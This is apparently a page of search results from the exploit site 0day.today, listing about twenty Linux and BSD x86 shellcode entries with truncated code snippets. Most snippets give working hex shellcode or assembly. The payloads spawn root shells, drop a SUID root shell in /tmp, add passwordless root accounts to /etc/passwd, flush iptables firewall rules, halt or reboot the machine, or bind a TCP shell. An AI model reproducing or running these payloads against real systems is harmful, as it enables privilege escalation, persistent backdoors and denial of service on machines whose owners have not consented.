
7258 matches found

0day.today
added 2018/01/18 12:0 a.m., 23 views

Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)

/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...

0.1 AI score

0day.today
added 2018/01/17 12:0 a.m., 18 views

Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...

7.1 AI score

0day.today
added 2018/01/17 12:0 a.m., 13 views

Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126

/ linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" hence dropping a SUID root shell in /tmp. / char shellc = / Shellcode to drop a SUID root shell in /tmp/sh. Forgive the Intel syntax...

7.4 AI score

0day.today
added 2018/01/17 12:0 a.m., 21 views

Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)

/ Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / email protected 12/20/2000. F.U. to ph1xry4n. -From me and dxmd... If I ripped this, show me the source... or better yet go barrow a shovel so you can d...

7.1 AI score

0day.today
added 2018/01/17 12:0 a.m., 26 views

Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : email protected Homepage: safemode.org File: w000t-shell.c / This shellcode will add a passwordless local root account 'w000t' Written by email protected Why so big ? it uses execve ;- /...

0.5 AI score

0day.today
added 2018/01/17 12:0 a.m., 21 views

Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)

Author: zillion Email: email protected Home: http://www.safemode.org Linux x86 shellcode that does an execve of /sbin/iptables -F in order to flush activated firewall rules. File: flush-iptables-shell.c / This shellcode will do /sbin/iptables -F Written by email protected / char shellcode=...

0.1 AI score

0day.today
added 2018/01/16 12:0 a.m., 16 views

Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push $0x74756873 "\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69 "\x68\x2f\x2f\x73\x62" // push $0x62732f2f "\x89\xe3" // mov...

7.1 AI score

0day.today
added 2018/01/16 12:0 a.m., 19 views

BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)

/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 39 bytes OS = BSD written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al lea ebx,esi+8 push ebx lea ebx,esi push ebx mov al,5...

7.4 AI score

0day.today
added 2018/01/16 12:0 a.m., 13 views

Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx...

7.4 AI score

0day.today
added 2018/01/16 12:0 a.m., 29 views

Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)

include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can write "\x6a\x0b\x58" instead of "\xb0\x0b", but the...

7.1 AI score

0day.today
added 2018/01/16 12:0 a.m., 27 views

BSD/x86 - execve (/bin/sh) Shellcode (28 bytes)

/ simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; void...

7.4 AI score

0day.today
added 2018/01/16 12:0 a.m., 23 views

Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)

/ linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte shellcode in all caps. I wasn't able to beat his code, but it's no longer special. / char shellcode = /...

7.4 AI score

0day.today
added 2018/01/16 12:0 a.m., 49 views

BSD/x86 - execve (/bin/sh) + seteuid(0) Shellcode (31 bytes)

/ simply execvebinsh+seteuid0 shellcode in 31 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org nerf nerf /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73"...

0day.today
added 2018/01/16 12:0 a.m., 13 views

Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)

include const char shellcode= "\x40" // inc %eax // "\x43" // inc %ebx "\xcd\x80"; // int $0x80 int main printf "\n+ Yet conditional %eax==0 Linux/x86 exit0 3 bytes or exit1 4 bytes" "\n+ Date: 18/06/2009" "\n+ Author: TheWorm" "\n\n+ Shellcode Size: %d bytes\n\n", sizeofshellcode-1; void...

7.4 AI score

0day.today
added 2018/01/16 12:0 a.m., 12 views

Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // pu...

0.3 AI score

0day.today
added 2018/01/16 12:0 a.m., 15 views

Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)

/ Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 = socketcall xorl %ecx,%ecx movl %ecx,%ebx incl %ebx socket movl...

7.4 AI score

0day.today
added 2018/01/16 12:0 a.m., 16 views

Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)

/ This shellcode writes to /etc/passwd the string for the user with uid&gid == 0; written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: nerf w00w00 BITS 32 jmp short path main: pop esi xor eax,eax push eax mov byte esi+11,al mov al,0x0a push eax push esi mov al,5 push eax...

0.3 AI score

0day.today
added 2018/01/16 12:0 a.m., 17 views

Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)

include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Terminates the //bin/sh string with a 0 "\x68\x6e\x2f\x73\x68"...

7.1 AI score

0day.today
added 2018/01/16 12:0 a.m., 16 views

BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)

/ writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax push eax push byte 0x64 push word 0x7773 push long 0x7361702f push long 0x6374652f mov ebx,esp mov al,0x0...

0.3 AI score

0day.today
added 2018/01/16 12:0 a.m., 18 views

Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)

/ jmp callw00w00 w00w00: popl %edi jmp w0w0w callw00w00: call w00w00 w0w0w: OPEN ecx=flag ORDONLY, OWRONLY, ... OWRONLY | OAPPEND | OCREAT = 0x441 edx=file mode ebx=address of filename eax=0x05 syscall number xorl %ebx,%ebx movb $file-w0w0w,%bl addl %edi,%ebx xorb %al,%al movb %al,11%ebx xorl...

7.4 AI score